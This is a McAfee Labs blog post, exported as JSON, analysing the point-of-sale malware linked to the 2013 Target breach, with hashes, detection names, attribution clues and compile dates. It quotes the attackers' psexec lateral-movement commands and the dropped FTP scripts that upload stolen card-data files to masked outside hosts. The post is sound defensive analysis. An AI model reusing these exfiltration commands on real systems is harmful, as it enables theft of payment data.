{"id":32598,"date":"2014-01-16T11:48:45","date_gmt":"2014-01-16T19:48:45","guid":{"rendered":"http:\/\/blogs.mcafee.com\/?p=32598"},"modified":"2025-05-27T20:37:37","modified_gmt":"2025-05-28T03:37:37","slug":"analyzing-the-target-point-of-sale-malware","status":"publish","type":"post","link":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/analyzing-the-target-point-of-sale-malware\/","title":{"rendered":"Analyzing the Target Point-of-Sale Malware"},"content":{"rendered":"<p><strong>January 21, 2014:<\/strong> As more information surrounding these events comes to light, we continue to identify and analyze additional components and behaviors. To shed more light on the malware specific to these events, our team in McAfee Labs has released an updated Threat Advisory entitled &#8220;<a title=\"EPOS Data Theft\" href=\"http:\/\/kc.mcafee.com\/corporate\/index?page=content&amp;id=PD24927\" target=\"_blank\" rel=\"noopener noreferrer\">McAfee Labs Threat Advisory: EPOS Data Theft<\/a>&#8221;. The report covers specific traits and activity around this family, in addition to some background on &#8220;BlackPOS&#8221;.
Updated details around McAfee countermeasures and mitigation are included as well.<\/p>\n<p><a title=\"EPOS Data Theft\" href=\"http:\/\/kc.mcafee.com\/corporate\/index?page=content&amp;id=PD24927\" target=\"_blank\" rel=\"noopener noreferrer\">McAfee Labs Threat Advisory: EPOS Data Theft<\/a><\/p>\n<h2><span style=\"text-decoration: underline;\"><strong>Current AV Detections:<\/strong><\/span><\/h2>\n<ul>\n<li>6597DF782CBD7DC270BB12CDF95D21B4 &#8211; BackDoor-FBPP<\/li>\n<li>5DBD7BC7A672DA61F6F43AAF6FA3C661 &#8211; BackDoor-FBPP<\/li>\n<li>BA443C2E10D0278FC30069F61BC56439 &#8211; BackDoor-FBPP<\/li>\n<li>7F9CDC380EEED16EAAB3E48D59F271AA &#8211; PWS-FBOI<\/li>\n<li>3D5BF67955DC77AF4CA8BF6CB1F96065 &#8211; PWS-FBOI<\/li>\n<li>BA0F556CE558453AD1526409B5B69EF3 &#8211; PWS-FBOI<\/li>\n<li>F45F8DF2F476910EE8502851F84D1A6E &#8211; PWS-FBOJ<\/li>\n<li>CE0296E2D77EC3BB112E270FC260F274 &#8211; PWS-FBOJ<\/li>\n<li>4D445B11F9CC3334A4925A7AE5EBB2B7 &#8211; BackDoor-FBPL<\/li>\n<li>7F1E4548790E7D93611769439A8B39F2 &#8211; BackDoor-FBPL<\/li>\n<li>762DDB31C0A10A54F38C82EFA0D0A014 &#8211; BackDoor-FBPL<\/li>\n<li>C0C9C5E1F5A9C7A3A5043AD9C0AFA5FD &#8211; BackDoor-FBPL<\/li>\n<\/ul>\n<h2><span style=\"text-decoration: underline;\"><strong>Additional Countermeasures<\/strong><\/span><\/h2>\n<ul>\n<li><strong>McAfee Application Control<\/strong> &#8211; Run-Time Control locks down systems and provides protection in the form of Execution Control and Memory Protection.<\/li>\n<\/ul>\n<p>Malware of this variety will typically be targeted. The adversaries will actively attempt to evade AV detection where possible. It is <strong>critical<\/strong> to apply countermeasures outside the typical AV scanning procedures.
Application Control\/Whitelisting will be extremely successful in blocking\/inhibiting these tools. In addition, network monitoring and controls (real-time monitoring and intelligent analytics of SIEM data) will allow victims to know exactly what malicious behaviors are occurring in their environment at the time of compromise, and where the artifacts\/indicators are.<\/p>\n<p><strong>January 16, 2014<\/strong>: In the last 24 hours, McAfee Labs has started to piece together more and more detail on the malware that is apparently tied to the campaign against Target. To recap, in November 2013 the retailer was compromised via undisclosed methods. The attackers were able to plant point-of-sale malware and intercept approximately 110,000,000 records worth of payments, transactions, and other personally identifiable data. Working backward, we can start to see evidence of the activity in December (prior to the story&#8217;s breaking) based on underground chatter, VirusTotal submissions, and other open-source intelligence sources.<\/p>\n<p><span style=\"line-height: 1.5em;\">Although there is no official confirmation, we have credible evidence to indicate that the malware used in the Target stores attack is related to existing malware kits sold in underground forums.
Related samples to date are somewhat similar in function to (and possibly derived from) known \u201cBlackPOS\u201d samples.<\/span><\/p>\n<h2><b><span style=\"text-decoration: underline;\">Sample Information\/Sources<\/span><\/b><\/h2>\n<ul>\n<li>ce0296e2d77ec3bb112e270fc260f274\u2013ThreatExpert (cache)<\/li>\n<li>F45F8DF2F476910EE8502851F84D1A6E\u2013ThreatExpert (cache)<\/li>\n<li>7f1e4548790e7d93611769439a8b39f2\u2013VirusTotal<\/li>\n<li>4d445b11f9cc3334a4925a7ae5ebb2b7\u2013VirusTotal<\/li>\n<li>762ddb31c0a10a54f38c82efa0d0a014\u2013VirusTotal<\/li>\n<li>c0c9c5e1f5a9c7a3a5043ad9c0afa5fd\u2013VirusTotal<\/li>\n<\/ul>\n<p><span style=\"line-height: 1.5em;\">7f1e4548790e7d93611769439a8b39f2 and 4d445b11f9cc3334a4925a7ae5ebb2b7 are uploaders that reveal many useful details about data collection, data transfer, and possibly the actor behind the campaign.<\/span><\/p>\n<h2><b style=\"line-height: 1.5em;\"><span style=\"text-decoration: underline;\">Possible Actor\/Attribution Data<\/span><\/b><\/h2>\n<p>Both uploaders contain the following string (compile path):<\/p>\n<ul>\n<li>z:\\Projects\\<strong>Rescator<\/strong>\\uploader\\Debug\\scheck.pdb<\/li>\n<\/ul>\n<p>Rescator is a known actor in various cybercrime forums.<\/p>\n<h2><b style=\"line-height: 1.5em;\"><span style=\"text-decoration: underline;\">Data Collection and Transfer<\/span><\/b><\/h2>\n<p>Data is collected and transferred to internal shares via the following command syntax:<\/p>\n<ul>\n<li>c:\\windows\\system32\\cmd.exe, c:\\windows\\system32\\cmd.exe \/c psexec \/accepteula \\\\<em>&lt;EPOS_IPaddr&gt; -u &lt;username&gt; -p &lt;password&gt;<\/em> cmd \/c &#8220;taskkill \/im bladelogic.exe \/f&#8221;<\/li>\n<li>c:\\windows\\system32\\cmd.exe, c:\\windows\\system32\\cmd.exe \/c psexec \/accepteula \\\\<em>&lt;EPOS_IPaddr&gt; -u &lt;username&gt; -p &lt;password&gt;<\/em> -d bladelogic<\/li>\n<li>c:\\windows\\system32\\cmd.exe, c:\\windows\\system32\\cmd.exe \/c move
\\\\<em>&lt;EPOS_IPaddr&gt;<\/em>\\nt\\twain_32a.dll c:\\program files\\xxxxx\\xxxxx\\temp\\data_2014_1_16_15_30.txt<\/li>\n<li>c:\\windows\\system32\\cmd.exe, c:\\windows\\system32\\cmd.exe \/c ftp -s:c:\\program files\\xxxxx\\xxxxx\\temp\\cmd.txt<\/li>\n<\/ul>\n<p><strong>Note:\u00a0<\/strong>The reference to &#8220;bladelogic&#8221; is a method of obfuscation. \u00a0The malware does not compromise, or integrate with, any BMC products in any way. \u00a0 The executable name &#8220;bladelogic.exe&#8221; does not exist in any piece of legitimate BMC software.<\/p>\n<p>\u201cttcopscli3acs\u201d is reportedly a Windows domain name used within Target stores.<\/p>\n<p><span style=\"line-height: 1.5em;\">7f1e4548790e7d93611769439a8b39f2 and 4d445b11f9cc3334a4925a7ae5ebb2b7 drop the following script upon execution:<\/span><\/p>\n<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br \/>\nopen xxx.xxx.xxx.xx<\/p>\n<p>%name%<\/p>\n<p>%password%<\/p>\n<p>cd public_html<\/p>\n<p>cd cgi-bin<\/p>\n<p>bin<\/p>\n<p>send C:\\Program Files\\xxxxxx \\xxxxxxxx\\Temp\\data_2014_%_%_%%_%%.txt<\/p>\n<p>quit<\/p>\n<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<\/p>\n<p><span style=\"line-height: 1.5em;\">Similar scripts are present in 762ddb31c0a10a54f38c82efa0d0a014 and c0c9c5e1f5a9c7a3a5043ad9c0afa5fd.<\/span><\/p>\n<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br \/>\nopen xx.xxx.xxx.xx<\/p>\n<p>%name%<\/p>\n<p>%password%<\/p>\n<p>cd 001<\/p>\n<p>bin<\/p>\n<p>send C:\\Program Files\\xxxxxx \\xxxxxxxx\\Temp\\data_2014_data_2014_%_%_%%_%%.txt<\/p>\n<p>quit<\/p>\n<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<\/p>\n<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br \/>\nopen 
xx.xx.xxx.xx<\/p>\n<p>%name%<\/p>\n<p>%password%<\/p>\n<p><span style=\"line-height: 1.5em;\">cd etc<\/span><\/p>\n<p>bin<\/p>\n<p>send C:\\Program Files\\xxxxxx \\xxxxxxxx\\Temp\\data_2014_data_2014_%_%_%%_%%.txt<\/p>\n<p>quit<\/p>\n<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<\/p>\n<h2><b><span style=\"text-decoration: underline;\">Compilation Dates<\/span><\/b><\/h2>\n<ul>\n<li>762ddb31c0a10a54f38c82efa0d0a014 &#8211; Sat Nov 30 17:52:00 2013 UTC<\/li>\n<li>4d445b11f9cc3334a4925a7ae5ebb2b7 &#8211; Sat Nov 30 17:21:17 2013 UTC<\/li>\n<li>c0c9c5e1f5a9c7a3a5043ad9c0afa5fd &#8211; Tue Dec\u00a0 3 00:15:01 2013 UTC<\/li>\n<li>7f1e4548790e7d93611769439a8b39f2 &#8211; Sat Nov 30 17:38:23 2013 UTC<\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>January 21, 2014: \u00a0As more information comes to light, surrounding these events, we continue to identify and analyze additional components&#8230;<\/p>\n","protected":false},"author":695,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[442],"tags":[1411,76,142,180,18],"coauthors":[4136],"class_list":["post-32598","post","type-post","status-publish","format-standard","hentry","category-mcafee-labs","tag-advanced-persistent-threats","tag-cybercrime","tag-tag-identity-theft","tag-malware","tag-network-security"],"acf":[],"yoast_head_json":{"title":"Analyzing the Target Point-of-Sale Malware | McAfee Blog","og_site_name":"McAfee Blog","article_published_time":"2014-01-16T19:48:45+00:00","article_modified_time":"2025-05-28T03:37:37+00:00","author":"McAfee Labs"}}